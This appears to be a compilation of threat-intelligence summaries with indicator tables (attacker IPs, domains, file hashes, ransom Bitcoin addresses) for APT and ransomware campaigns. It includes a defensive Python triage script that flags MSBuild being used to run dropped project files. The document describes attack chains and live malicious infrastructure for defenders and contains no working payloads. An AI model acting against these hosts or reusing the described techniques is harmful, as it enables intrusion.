Unraveling SloppyLemming's Operations Across South Asia
An investigation reveals SloppyLemming, an advanced threat actor targeting South and East Asian countries, particularly Pakistan. The group uses multiple cloud services for credential harvesting, malware delivery, and command and control. Its operations focus on government, law enforcement, energy, telecommunications, and technology entities in Pakistan, Bangladesh, Sri Lanka, and China. SloppyLemming relies on phishing, exploits known vulnerabilities (the indicator list below includes CVE-2023-38831, the WinRAR archive-handling flaw), and uses a range of malware tools. The actor's poor operational security has provided insight into its tooling and infrastructure. Cloudflare has taken steps to disrupt the actor's operations and collaborated with industry partners to mitigate the threat.

Type | Indicator
--- | ---
IPv4 | 139.59.109.136
IPv4 | 142.93.139.164
IPv4 | 149.28.153.250
IPv4 | 185.249.198.218
IPv4 | 45.137.116.8
IPv4 | 47.245.126.218
IPv4 | 47.254.229.56
CVE | CVE-2023-38831
FileHash-MD5 | 659ab8cb034e557fce0c3ecd631f3590
FileHash-MD5 | e2a32e7d772a9a4eeccee9c71ec3a6d4
FileHash-MD5 | fa40357daaa8ed8e73eeef25f0f478ac
FileHash-SHA1 | 9b45b35d577680022e20d20dc7052463398ccf36
FileHash-SHA1 | b53de85852479ea2a772bd3407b9e4d38eb1e1e7
FileHash-SHA1 | bc490c61ce87efc0faf93dd4160219ef303e3e1d
FileHash-SHA256 | 06f82a8d80ec911498e3493ebefa8ad45e102dd887ce2edc11f8f51bafab2e80
FileHash-SHA256 | 3dfb8d198de95090e2ad3ffc9d9846af5c3074563acb0ce5b0ef62b20e4bf432
FileHash-SHA256 | 82e99ceea9e6d31555b0f2bf637318fd97e5609e3d4d1341aec39db2e26cf211
FileHash-SHA256 | 95cf90b2610c6f0ec67c1d669cd252468f6c3b8eaeea588f342d2bd74d90e093
FileHash-SHA256 | a3c9b56a0ce787d7aa7787d9ff0e806a6fb0b216327591b1e1113391c609fd17
FileHash-SHA256 | ac3dff91982709f575cfbc6954b61130b4eeab5d3759772db220f1b76836be4d
FileHash-SHA256 | b6ae5b714f18ca40a111498d0991e1e30cd95317b4904d2ef0d49937f0552000
FileHash-SHA256 | e3bc0246ab95b527aa86e52e62f554ab8db04523f35aee50b508d0fa48ab49f7
FileHash-SHA256 | fb4397c837c7e401712764f953723153d5bb462bc944518959288ea47dec6446
IPv4 | 159.253.120.25
IPv4 | 159.65.6.251
IPv4 | 207.148.73.145
IPv4 | 208.85.22.252
IPv4 | 37.27.41.167
IPv4 | 47.236.65.190
IPv4 | 47.237.105.113
IPv4 | 47.237.20.135
IPv4 | 47.237.20.201
IPv4 | 47.237.25.198
IPv4 | 47.245.114.11
IPv4 | 47.245.2.77
IPv4 | 47.245.42.208
IPv4 | 47.245.56.29
IPv4 | 47.74.84.168
IPv4 | 47.74.87.155
IPv4 | 47.76.181.76
IPv4 | 47.76.61.241
IPv4 | 47.83.23.246
IPv4 | 8.219.114.124
IPv4 | 8.219.169.226
IPv4 | 8.222.235.145
domain | cflayerprotection.com
domain | cloudlflares.com
domain | crec-bd.site
domain | email.click
domain | hit-pk.org
domain | humariweb.info
domain | itsupport-gov.com
domain | jammycanonicalupdates.cloud
domain | link.click
domain | modp-pk.org
domain | mofapak.info
domain | opensecurity-legacy.com
domain | paknavy-pk.org
domain | quran-books.store
domain | updpcn.online
hostname | accounts.opensecurity-legacy.com
hostname | acrobat.paknavy-pk.org
hostname | api.opensecurity-legacy.com
hostname | bin.opensecurity-legacy.com
hostname | blabla.apl-com.icu
hostname | browser.apl-org.online
hostname | cloud.adobefileshare.com
hostname | cloud.cflayerprotection.com
hostname | confidential.zapto.org
hostname | data.cloudlflares.com
hostname | dawn.apl-org.online
hostname | docs.apl-com.icu
hostname | fonts.apl-org.online
hostname | frontend-m.opensecurity-legacy.com
hostname | hesco.hascolgov.info
hostname | hurr.zapto.org
hostname | locaal.navybd-gov.info
hostname | localhost.apl-com.icu
hostname | locall.hascolgov.info
hostname | login.apl-org.online
hostname | m.opensecurity-legacy.com
hostname | mail.apl-com.icu
hostname | mail.pakistangov.com
hostname | mailpitb-securedocs.zapto.org
hostname | monitor.opensecurity-legacy.com
hostname | oil.hascolgov.info
hostname | openkm.paknavy-pk.org
hostname | owa-spamcheck.apl-org.online
hostname | pitb.zapto.org
hostname | redzone.apl-org.online
hostname | redzone2.apl-org.online
hostname | sco.zapto.org
hostname | secure.cflayerprotection.com
hostname | secure.cloudlflares.com
hostname | sensors.opensecurity-legacy.com
hostname | static.opensecurity-legacy.com
hostname | update.apl-org.online
hostname | www.168-gov.info
hostname | www.cloudlflares.com
hostname | www.crec-bd.site
hostname | zero-berlin-covenant.apl-org.online

BBTok Targeting Brazil: Deobfuscating the .NET Loader with dnlib and PowerShell
This analysis dissects the infection chain of BBTok, a Brazilian-targeted threat. The malware arrives as an ISO image containing a shortcut file and various components. It uses the Microsoft Build Engine (MSBuild) to compile and execute malicious C# code on the victim's machine. The core component, Trammy.dll, is obfuscated with ConfuserEx and executed through AppDomain Manager injection. The malware creates a log file, gathers system information, and establishes persistence through scheduled tasks and service creation. It downloads additional components, including CCProxy for traffic manipulation and a Delphi payload. The attack specifically targets Brazilian IP addresses and employs evasion techniques to avoid detection.

Type | Indicator
--- | ---
FileHash-MD5 | 3aeefe5867b49d1d323502e2b86d40e1
FileHash-MD5 | 4d7d4d92dc7d86b72abf81821ff83837
FileHash-MD5 | 950e785d417105c2a8dae00571ef7923
FileHash-MD5 | c479d696d08fc9414920deae7983ca8e
FileHash-SHA1 | 704efd1447be699762781a4b67e4c1ae1f7c9789
FileHash-SHA1 | 9672cade96c657a8860d60923afdbe4c46a2935d
FileHash-SHA1 | 970cdb16e5fc52be85e311f6c28dbb75086f1cf3
FileHash-SHA1 | cc9f6c4f482d5fce70ed907d781db2d409e15bc3
FileHash-SHA256 | 09027fa9653bdf2b4a291071f7e8a72f14d1ba5d0912ed188708f9edd6a084fe
FileHash-SHA256 | 24fac4ef193014e34fc30f7a4b7ccc0b1232ab02f164f105888aabe06efbacc3
FileHash-SHA256 | 276a1e9f62e21c675fdad9c7bf0a489560cbd959ac617839aeb9a0bc3cd41366
FileHash-SHA256 | 27914c36fd422528d8370cbbc0e45af1ba2c3aeedca1579d92968649b3f562f7
FileHash-SHA256 | 2d2c2ba0f0d155233cdcbf41a9cf166a6ce9b80a6ab4395821ce658afe04aaba
FileHash-SHA256 | 2ff420e3d01893868a50162df57e8463d1746d3965b76025ed88db9bb13388af
FileHash-SHA256 | 35db2b34412ad7a1644a8ee82925a88369bc58f6effc11d8ec6d5f81650d897e
FileHash-SHA256 | 5e5a58bfabd96f0c78c1e12fa2625aba9c84aa3bd4c9bb99d079d6ccb6e46650
FileHash-SHA256 | 7559c440245aeeca28e67b7f13d198ba8add343e8d48df92b7116a337c98b763
FileHash-SHA256 | 7566131ce0ecba1710c1a7552491120751b58d6d55f867e61a886b8e5606afc3
FileHash-SHA256 | 8e7f0a51d7593cf76576b767ab03ed331d822c09f6812015550dbd6843853ce7
FileHash-SHA256 | a3afed0dabefde9bb8f8f905ab24fc2f554aa77e3a94b05ed35cffc20c201e15
FileHash-SHA256 | ac044dd9ae8f18d928cf39d24525e2474930faf8e83c6e3ad52496ecab11f510
FileHash-SHA256 | b60eb62f6c24d4a495a0dab95cc49624ac5099a2cc21f8bd010a410401ab8cc3
FileHash-SHA256 | cb1d2659508a4f50060997ee0e60604598cb38bd2bb90962c6a51d8b798a03b6
FileHash-SHA256 | dc03070d50fdd31c89491d139adfb211daf171d03e9e6d88aac43e7ff44e4fef
FileHash-SHA256 | ddf84fdc080bd55f6f2b409e596b6f7a040c4ab1eb4b965b3f709a0f7faa4e02
domain | fileondemandd.site
hostname | contador.danfajuda.com

Unraveling Sparkling Pisces's Tool Set: KLogEXE and FPSpy
Unit 42 researchers have uncovered two new malware samples used by the North Korean threat group Sparkling Pisces (aka Kimsuky): a previously undocumented keylogger called KLogEXE and a variant of a backdoor named FPSpy. The analysis reveals the group's evolving capabilities and extensive arsenal. Both samples share code and use similar techniques for data exfiltration and command execution. The research highlights Sparkling Pisces's continuous evolution, expanding infrastructure, and targeting of South Korean and Japanese entities, and provides insight that helps defend against the group's tactics.

Type | Indicator
--- | ---
FileHash-SHA256 | 2e768cee1c89ad5fc89be9df5061110d2a4953b336309014e0593eb65c75e715
FileHash-SHA256 | 990b7eec4e0d9a22ec0b5c82df535cf1666d9021f2e417b49dc5110a67228e27
FileHash-SHA256 | a173a425d17b6f2362eca3c8ea4de9860b52faba414bbb22162895641dda0dc2
FileHash-SHA256 | c69cd6a9a09405ae5a60acba2f9770c722afde952bd5a227a72393501b4f5343
FileHash-SHA256 | faf666019333f4515f241c1d3fcfc25c67532463245e358b90f9e498fe4f6801
IPv4 | 152.32.138.167
hostname | mail.apollo-page.r-e.kr
hostname | nidlogin.apollo.r-e.kr

Analyzing the Newest Turla Backdoor
The Russian APT group Turla has launched a new campaign using shortcut files to infect systems with a fileless backdoor. The malware employs evasion techniques such as disabling ETW and AMSI and unhooking. The attack begins with a shortcut file mimicking a PDF, which drops a file that is then executed with MSBuild. The final payload is a fileless backdoor obfuscated with SmartAssembly. The backdoor implements custom commands for file creation and PowerShell script execution and communicates with its C2 server using encrypted and encoded data. The analysis details techniques used to avoid detection, including DLL mapping to bypass hooks and patching of ETW- and AMSI-related functions.

Type | Indicator
--- | ---
FileHash-MD5 | 005c762a3c39b1114c6521f52acb66c3
FileHash-MD5 | 371ef30b422378d95f64804391f24818
FileHash-MD5 | a88597f35bf778f4a0c21d7f231c9091
FileHash-SHA1 | 19d576e1a7c0c7e6dae6dce79743db5f2defa79f
FileHash-SHA1 | 47791e973dc71e23de8635d801509149d9d74288
FileHash-SHA1 | bcbdff86daeb92215081dffc8660900816159721
FileHash-SHA256 | 7091ce97fb5906680c1b09558bafdf9681a81f5f524677b90fd0f7fc0a05bc00
FileHash-SHA256 | 8d6fe8e336e020410753ff15ece5f36bae992f7f234385a23590a11ed734792d
FileHash-SHA256 | b6abbeab6e000036c6cdffc57c096d796397263e280ea264eba73ac5bab39441
FileHash-SHA256 | cac4d4364d20fa343bf681f6544b31995a57d8f69ee606c4675db60be5ae8775
hostname | files.philbendeck.com

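Both the BBTok chain and the Turla chain above hand a dropped file to MSBuild so that it compiles and runs attacker C# in-process (MSBuild project files can carry inline tasks; MITRE ATT&CK tracks this as T1127.001). The triage logic below is an added example, not code from either report and not based on the specific command lines those campaigns used: it scores Sysmon-style process-creation events on three signals a defender can check without knowing the payload. The event records are constructed for the example; the drop-directory list and the score threshold are assumptions to tune for an environment.

```python
"""Triage process-creation events for MSBuild used as a code-execution proxy:
a project file handed to MSBuild can contain an inline task whose C# body is
compiled and run inside msbuild.exe (MITRE ATT&CK T1127.001).
Added example; not from the BBTok or Turla reports."""
import re

# Assumed: locations where a lure-dropped project file would land. A developer's
# repo under C:\Users\<name>\source is deliberately NOT in this list, so a
# routine Visual Studio build does not score on this signal.
DROP_DIRS = ("\\temp\\", "\\downloads\\", "\\public\\", "\\programdata\\",
             "\\appdata\\local\\", "\\appdata\\roaming\\")
BUILD_EXTS = {".csproj", ".vbproj", ".fsproj", ".proj", ".sln", ".targets", ".props"}
DEV_PARENTS = {"devenv.exe", "dotnet.exe", "msbuild.exe", "vbcscompiler.exe"}


def split_cmdline(cmdline):
    """Split a Windows command line on whitespace, keeping quoted paths intact."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def project_file_arg(cmdline):
    """MSBuild treats the first argument that is not a /switch or -switch as
    the project file; return it, or None if MSBuild would search the cwd."""
    for tok in split_cmdline(cmdline)[1:]:
        if not tok.startswith(("/", "-")):
            return tok
    return None


def assess_msbuild_event(event):
    """Score one event. Returns (score, reasons); non-MSBuild events score 0."""
    image = event.get("Image", "").lower()
    if not image.endswith("\\msbuild.exe"):
        return 0, []
    score, reasons = 0, []
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    if parent not in DEV_PARENTS:
        score += 1  # a shortcut -> cmd/explorer/powershell -> MSBuild chain lands here
        reasons.append(f"parent {parent or 'unknown'} is not a build tool")
    proj = project_file_arg(event.get("CommandLine", ""))
    if proj is not None:
        lowered = proj.lower()
        basename = lowered.rsplit("\\", 1)[-1]
        ext = "." + basename.rsplit(".", 1)[-1] if "." in basename else ""
        if ext not in BUILD_EXTS:
            score += 2  # MSBuild will happily build an .xml/.txt/extension-less file
            reasons.append(f"project file {proj} has a non-build extension")
        if any(d in lowered for d in DROP_DIRS):
            score += 1
            reasons.append(f"project file {proj} sits in a drop directory")
    return score, reasons


def triage(events, threshold=2):
    """Return [(index, score, reasons)] for events at or above the threshold."""
    out = []
    for i, ev in enumerate(events):
        score, reasons = assess_msbuild_event(ev)
        if score >= threshold:
            out.append((i, score, reasons))
    return out


# Constructed Sysmon-style events: one normal IDE build, one lure-style launch
# of a dropped .xml "project" from Temp, one .csproj run from Downloads by
# explorer.exe, and one unrelated process.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "CommandLine": r'"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe" C:\Users\dev\source\repos\app\app.csproj /t:Build /p:Configuration=Release'},
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Users\victim\AppData\Local\Temp\report.xml"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" "C:\Users\victim\Downloads\setup\build.csproj"'},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for idx, score, reasons in triage(SAMPLE_EVENTS):
        print(f"event {idx}: score {score}")
        for r in reasons:
            print("   -", r)
```

The non-build extension carries the most weight because it has no legitimate explanation, while a non-IDE parent or a project in a drop directory each occurs in benign use on its own; requiring two points keeps a developer running `msbuild` from a terminal off the alert queue while still catching both chains described above.
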
Cyberespionage the Gamaredon way: Analysis of toolset used to spy on Ukraine in 2022 and 2023
This report provides a comprehensive analysis of the toolset used by the Russia-aligned Gamaredon APT group to conduct cyberespionage against Ukraine in 2022 and 2023. The group has been active since 2013 and is currently the most prolific threat actor targeting Ukrainian governmental institutions. Gamaredon employs a variety of custom malware written in PowerShell, VBScript, and C, as well as some open-source tools. The analysis covers its tactics for initial access, including spearphishing and weaponized documents and USB drives, and details numerous tools used for downloading payloads, dropping files, weaponizing systems, stealing data, and maintaining backdoor access. The report also examines Gamaredon's obfuscation techniques, network infrastructure, and methods for bypassing domain-based blocking.

Type | Indicator
--- | ---
IPv4 | 5.181.156.109
IPv4 | 161.35.106.28
IPv4 | 185.163.47.177
IPv4 | 185.225.19.16
FileHash-SHA1 | 025e3d88c53fc12d5a4aab726e696f2815bac84d
FileHash-SHA1 | 04f1ed3050d6b2527d6196dff5845b10510d0c2f
FileHash-SHA1 | 0fa9303ed739a3c6a76cef4517b9adb60c73ca80
FileHash-SHA1 | 0fd02b12517221f71a4a3774630c05643ee59988
FileHash-SHA1 | 13ba279d8602fee7cede152b6a9148cd9d2f6662
FileHash-SHA1 | 16fd6cba3f13cc5b195cd6c0dd33bbf08cd0fe39
FileHash-SHA1 | 1aeae7a567c71200ba804801c4cec227d2b64414
FileHash-SHA1 | 224b18e531e511cea2849d9a3b9cf5ad502afecc
FileHash-SHA1 | 2416dfc031cf0d05054d5beb9739cba6470fe585
FileHash-SHA1 | 28f4f0367c2bb0574c8a7d1b9c3e71e6ac678300
FileHash-SHA1 | 2b9b0ad0b65bb6101704684cd339e946fae2dcfa
FileHash-SHA1 | 2cdb1da4df1a33e379c2f24dd6a05709f4848cb6
FileHash-SHA1 | 44c720ae508f448263a83cac26775d6709dfbbdd
FileHash-SHA1 | 47a03ebb9798a8df7ec8212134d418e937b449e9
FileHash-SHA1 | 49cf239ab2ebd04cafdcec07fbb0c1c1a43e8c02
FileHash-SHA1 | 4f915541291120aa100123c1c93fa7de78f46a3f
FileHash-SHA1 | 565a4cd6e4f74e17a37d34e6ef93ab6ded71b3aa
FileHash-SHA1 | 5720ffdf9d9cd649445cbc12844e2b587622643a
FileHash-SHA1 | 5befc01a3771e61151224e18f926226ff7fd4a40
FileHash-SHA1 | 6d694b73a2c497f16eb9b5cca883658397ffbedf
FileHash-SHA1 | 742e34ba21650ecb0b7ef33f786641f0be823be8
FileHash-SHA1 | 7793282401b134077e70217b55b0c4b45850d119
FileHash-SHA1 | 801a9b08987977692223b7105dec8b21b9d9749e
FileHash-SHA1 | 82123c17117ef235f3b57d0c5572c861e3ed7173
FileHash-SHA1 | 821362a484908e93f8ba748b600665ae6444303d
FileHash-SHA1 | 8a2261d8c8111d2d99276575120b9ea65d0aeaea
FileHash-SHA1 | 9a6b36e6cad9156ea6e09de740d3f1ccb6816f87
FileHash-SHA1 | 9b6ef236d9dc758336f1d89268822f8611c8b973
FileHash-SHA1 | 9e30dffdb88dd3adfab4cd5c67a98336c4bf9504
FileHash-SHA1 | a3c21f9a493a05f9428e8f5fe5af7f0c2bf67f95
FileHash-SHA1 | a93503bbb613f084add338b9fa2eee466bf3a2d6
FileHash-SHA1 | ac17fd08a3987cc91dfd6649ba3dabe8a9671305
FileHash-SHA1 | b08305c557692619b9d0eaf5b58a8b91858cf4d5
FileHash-SHA1 | b2b58cef19546b2d2284b2eb5f22b6d8fdb94d4e
FileHash-SHA1 | b50f10bbdb49be6d868b09f3e1dd6c78d58d8e89
FileHash-SHA1 | b99d4724077b0a2cbeee38332c05f3d4171c9dcc
FileHash-SHA1 | ba2366ed4e83ffc6dec489c9011fe181ce169a47
FileHash-SHA1 | ba5f7e2fa9be1cb3fc7ae113f41c36e4f2c464b6
FileHash-SHA1 | cb9712bed15723973171192da17946bf6778d98d
FileHash-SHA1 | d5576e578518e474a5dff654c44ab3ec4a6e4ecf
FileHash-SHA1 | d58bfb39969f28698f90bf2e8782057e2f83c2df
FileHash-SHA1 | df1c0a70e7a02b839ab3aac3fc410e61eefb58eb
FileHash-SHA1 | e0bd8855159cb708789c4de183e107c5c117fba1
FileHash-SHA1 | e2feee0b92819ac7fca85cfe3dc37750834f0990
FileHash-SHA1 | e537deaf3a77c5c0f0b9f8a12ff5995dd24cd259
FileHash-SHA1 | f05874c1b908fdef4b9af2b084e3d813595a12c9
FileHash-SHA1 | fea57a486eb4bdac5e7d59c9958c42293a5abe12
IPv4 | 141.98.233.17
IPv4 | 143.198.160.45
IPv4 | 159.223.152.63
IPv4 | 164.92.115.188
IPv4 | 165.227.208.207
IPv4 | 167.172.139.39
IPv4 | 185.163.45.5
IPv4 | 188.166.247.34
IPv4 | 194.180.191.30
IPv4 | 195.133.88.128
IPv4 | 209.97.165.187
IPv4 | 212.18.104.56
IPv4 | 46.29.234.46
IPv4 | 5.252.178.140
IPv4 | 62.133.62.73
IPv4 | 67.205.160.237
IPv4 | 68.183.2.92
IPv4 | 80.90.181.107
IPv4 | 89.185.84.141
IPv4 | 89.185.84.204
IPv4 | 89.19.209.154
IPv4 | 89.23.107.188
IPv4 | 91.200.148.232
domain | absorbeni.ru
domain | amasiyagi.ru
domain | consentesto.ru
domain | dfgqdsd.ru
domain | fritopa.ru
domain | goloser.ru
domain | hakold.ru
domain | havxcq.ru
domain | hulortad.ru
domain | lokalut.ru
domain | loturam.ru
domain | marginisbi.ru
domain | nikortal.ru
domain | nododru.ru
domain | opela.ru
domain | retarus.ru
domain | rieturc.ru
domain | statuesque.ru
domain | tolofa.ru
domain | using.ru
domain | youdad.ru
hostname | login.kifales.ru
hostname | www.toorisugita.ru

MimiStick, imitators of Sticky Werewolf
F.A.C.C.T. Threat Intelligence discovered a malicious file targeting Russian defense industry enterprises. The attack used a PDF lure mimicking a letter from the Russian Ministry of Labor, and the malware ran a multi-stage infection chain that ultimately deployed a Sliver implant. The activity was initially attributed not to Sticky Werewolf but to a new threat actor, dubbed MimiStick; later findings confirmed that the campaign was in fact Sticky Werewolf's, with the group having expanded its toolkit to include a Sliver implant alongside its existing Quasar RAT. The group registered multiple domains, including one impersonating the Ministry of Labor, likely for future phishing campaigns.

Type | Indicator
--- | ---
FileHash-MD5 | 0756de02dd3b4be840d31c8871148f7f
FileHash-MD5 | 5ed144351c41eb690d86c523690eb265
FileHash-MD5 | 67aa63c4518a3604e37f89ad0d39a34d
FileHash-MD5 | 725e5068bd68c3d055f3a814f402a8be
FileHash-MD5 | 7e151444c98ef2cf084eed8e6d4be807
FileHash-MD5 | 873454911a81a6c892838c44cbb3059b
FileHash-SHA1 | 2849ad434d55b8f2bc067c37903b5ff5bad01dbd
FileHash-SHA1 | 3100e869b1052dee920f7f2ca35da60abdf5aac0
FileHash-SHA1 | 3fba74f0f7f91f665ad68db9004f1fec3486595b
FileHash-SHA1 | c15716d127961eb1ca4c4d6192af6e1c5c8a2d8d
FileHash-SHA1 | e8ba03b13f9b51abcc9a539d09f98b61b2b4ccd0
FileHash-SHA1 | efd81a26fd43124d435bc0223c5f42839f793d42
FileHash-SHA256 | 3877f9fd6b21ee735130421dcf997cf000ae66b20a1c6a490f23431b2f95fa90
FileHash-SHA256 | 5ad093aa3eaf2bb76003f8f2f9de9b1368640aa320fa8d77df2c773f75186a71
FileHash-SHA256 | 65096aa2895025d94b934eb4198ea160e067e8e5c97d9ea252cb2de3870b7b2f
FileHash-SHA256 | 8d83a598aa61a3f2e61bfdcdfc7b29b4c8d357eb43562d349053defa1ce50d78
FileHash-SHA256 | b262dd5373213c5af573a08b409f8142c7f9f92b19536d7d78b4515d23452321
FileHash-SHA256 | ff16334c4cbbfed4bfca23436493397d0465c643cce6cbe41426067bb1ce14ff
IPv4 | 213.183.54.123
domain | about-tech.ru
domain | borosan.ru
domain | min-trud-gov.ru
domain | mysafer.ru
domain | orkprank.ru
domain | rtxcore.ru
domain | techitzone.ru

Iran-based Cyber Actors Enabling Ransomware Attacks on US Organizations
This advisory outlines the activities of an Iran-based cyber threat group that has conducted numerous intrusions against organizations in the United States and other countries since 2017, with the goal of obtaining network access to facilitate ransomware attacks. The group, known by various names including Pioneer Kitten and UNC757, exploits vulnerabilities in public-facing devices to gain initial access, then uses credential theft, remote access tools, and webshells to maintain persistence and move laterally within compromised networks. A significant portion of its operations involves collaborating with ransomware affiliates such as NoEscape and ALPHV to deploy ransomware and extort victims. The advisory provides details on the group's tactics, techniques, and procedures, indicators of compromise, and recommended mitigations.

Type | Indicator
--- | ---
BitcoinAddress | bc1q2egjjzmchtm3q3h3een37zsvpph86hwgq4xskh
BitcoinAddress | bc1q6620fmev7cvkfu82z43vwjtec6mzgcp5hjrdne
BitcoinAddress | bc1q6w2an66vrje747scecrgzucw9ksha66x9zt980
BitcoinAddress | bc1q8n7jjgdepuym825zwwftr3qpem3tnjx3m50ku0
BitcoinAddress | bc1qjzw7sh3pd5msgehdaurzv04pm40hm9ajpwjqky
BitcoinAddress | bc1ql837eewad47zn0uzzjfgqjhsnf2yhkyxvxyjjc
BitcoinAddress | bc1qlwd94gf5uhdpu4gynk6znc5j3rwk9s53c0dhjs
BitcoinAddress | bc1qn5tla384qxpl6zt7kd068hvl7y4a6rt684ufqp
BitcoinAddress | bc1qr6h2zcxlntpcjystxdf7qy2755p25yrwucm4lq
BitcoinAddress | bc1qsn4l6h3mhyhmr72vw4ajxf2gr74hwpalks2tp9
BitcoinAddress | bc1qtjhvqkun4uxtr4qmq6s3f7j49nr4sp0wywp489
BitcoinAddress | bc1qx9tteqhama2x2w9vwqsyny6hldh8my8udx5jlm
BitcoinAddress | bc1qy8pnttrfmyu4l3qcy59gmllzqq66gmr446ppcr
BitcoinAddress | bc1qz75atxj4dvgezyuspw8yz9khtkuk5jpdgfauq8
FileHash-SHA256 | 0a6f992e1372db4f245595424a7436ebb610775d6addc4d568acc2af5d315221
FileHash-SHA256 | 14f8ad7d1553d1a47cf4c9e7bedabcc5b759c86e54c636175a472c11d7dec70f
FileHash-SHA256 | 185ada4556737a4f26ae16f1a99ca82ab5684c32719ee426c420c0bc14384a0a
FileHash-SHA256 | 2c76104c9aaaf32453a814c227e7d9d755451b551a3fd30d2ea332df396b3a31
FileHash-SHA256 | 3488458145eb62d7d3947e3811234f4663d9b5aeef6584ab08a2099a7f946664
FileHash-SHA256 | b761680e23f2ebb5f6887d315ebd05b2d7c365731e093b49adb059c3dccaa30c
FileHash-SHA256 | ea2ec0c3859d8d8c36d95a298beef6d7add17856655bfbea2554b8714f7c7c69
domain | githubapp.net
hostname | api.gupdate.net
hostname | cloud.sophos.one
hostname | login.forticloud.online

Inside the Dragon: DragonForce Ransomware Group
In this blog, Group-IB delves into the inner workings of the DragonForce ransomware group. First observed in August 2023, DragonForce has targeted companies in critical sectors with a variant built from the leaked LockBit 3.0 builder and, since July 2024, with a second ransomware variant of its own. DragonForce runs a Ransomware-as-a-Service (RaaS) affiliate program around these two encryptors: one is the LockBit 3.0 derivative, and the other, although initially presented as original, is based on Conti v3. The group employs double extortion, encrypting data and threatening to leak it unless a ransom is paid.

Type | Indicator
--- | ---
IPv4 | 185.73.125.8
IPv4 | 94.232.46.202
IPv4 | 69.4.234.20
IPv4 | 2.147.68.96
IPv4 | 185.59.221.75
FileHash-MD5 | 97b70e89b5313612a9e7a339ee82ab67
FileHash-MD5 | a50637f5f7a3e462135c0ae7c7af0d91
FileHash-MD5 | bb7c575e798ff5243b5014777253635d
FileHash-MD5 | c111476f7b394776b515249ecb6b20e6

Infrastructure linking PandorahVNC and Mesh Central
This analysis investigates PandorahVNC, a hidden VNC (hVNC) tool, and its connections to a new service called AnonVNC. The report explores the online presence of the tool's creator, known as 'All_father', and examines the infrastructure used for both PandorahVNC and AnonVNC. It reveals links between these services and MeshCentral, a legitimate remote session manager, and uncovers potential new developments in the creator's toolkit, including use of MeshCentral's Mesh Agent. The report also discusses the threat actors, from state-sponsored groups to cybercriminals, who have leveraged PandorahVNC for malicious purposes.

Type | Indicator
--- | ---
IPv4 | 62.112.11.136
FileHash-MD5 | c7c699eb8695a564fe0b400b1bf138ba
FileHash-SHA1 | 52e3be4428c5c2b42d64ba9bcc584472391157c5
IPv4 | 141.95.6.166
IPv4 | 51.254.27.112
IPv4 | 66.94.109.162
IPv4 | 94.131.121.91
domain | anonvnc.com
domain | hiddenvnc.com
domain | hvncs.com
domain | pandorahvnc.shop
domain | validatax.com
domain | vncapk.io

LummaC2: Obfuscation Through Indirect Control Flow
This analysis examines a control flow obfuscation technique used by recent LummaC2 stealer samples. The malware employs customized control flow indirection to manipulate execution, hindering reverse engineering and automated analysis. The obfuscation transforms functions into 'dispatcher blocks' that use encoded offsets and indirect jumps to obscure the original control flow. Three main dispatcher types are identified: register-based, memory-based, and mixed-order. The analysis also covers conditional dispatcher logic for loops and syscalls. To deobfuscate, the researchers developed an automated method using symbolic backward slicing to separate dispatcher instructions from original code and recover the true control flow, which allows deobfuscated functions to be rebuilt for analysis.

Type | Indicator
--- | ---
FileHash-MD5 | 205e45e123aea66d444feaba9a846748
FileHash-MD5 | 5099026603c86efbcf943449cd6df54a
FileHash-MD5 | d01e27462252c573f66a14bb03c09dd2

Sophisticated Malware Campaign Targets Czech Officials Using NATO-Themed Decoys
Seqrite Labs APT-Team discovered a sophisticated malware campaign targeting government and military officials in the Czech Republic. The campaign leveraged NATO-themed decoy documents to lure victims and employed a multistage attack chain involving a malicious batch script, a Rust-based loader, and the Havoc post-exploitation framework. It used techniques such as ETW patching, process injection, and encrypted payloads to evade detection and establish persistence on compromised systems. The threat actor behind the operation appears to have Russian origins and used open-source offensive tools extensively.

Type | Indicator
--- | ---
FileHash-MD5 | 00a78177ed7a711c8cdddcb73d4f9784
FileHash-MD5 | 6eb2eb8f723163932b51ffb5274f5304
FileHash-MD5 | a077b9179728e25aad4334f89bd5dd36
FileHash-MD5 | a08edbfab6084c1861f8e7aecaf8c25d
FileHash-MD5 | a8d7e56eb01a8cf576533db9af2e92ec
FileHash-MD5 | b31b8310a136a0ba4e90b368a351f53f
FileHash-MD5 | de31247081978512be6a8ca58b4752a4
FileHash-SHA1 | 192f767c2d27966f50109fb62ff645fe38cc8d97
FileHash-SHA1 | 20ed156d55454bf084004b39115073d0b2551355
FileHash-SHA1 | 3593d39611d8e1ecb190ec76cedab4c1e214be72
FileHash-SHA1 | 6c1bdbc71f93642f0b5b9dfc85ae1501510f5e12
FileHash-SHA1 | 8d2e67d031ce8d3c7f65dcdf7dfcdd28dea19bd9
FileHash-SHA1 | a960549eb634dbc781dc617f9000d3d29aa8711a
FileHash-SHA1 | ab26bff6f61dfe1fef20656e364c4492ba1ab335
FileHash-SHA256 | 1dbcade04333b9dc81ba0746bc604d12489da49b9b65fcb5b1f61d139dc5949c
FileHash-SHA256 | 38da8d1576bdd0a03e649e8e6543594b35a423aa5b0a0c4081fc477c8e487e09
FileHash-SHA256 | 436994d4a5c8d54acb2b521d0847d77e6af6c2c0e40468248b1dd019c6dafa84
FileHash-SHA256 | 6e0d12cd0252599fd1dec7aa460cae7a12a1b2e322b6664e64c773c23627d1b4
FileHash-SHA256 | 8820e0c249305ffa3d38e72a7f27c0e2195bc739d08f5d270884be6237eea500
FileHash-SHA256 | 9549d3d2b8e8b4e8f163a8b9fa3b02b8a28d78e4b583baccb6210ef267559c6e
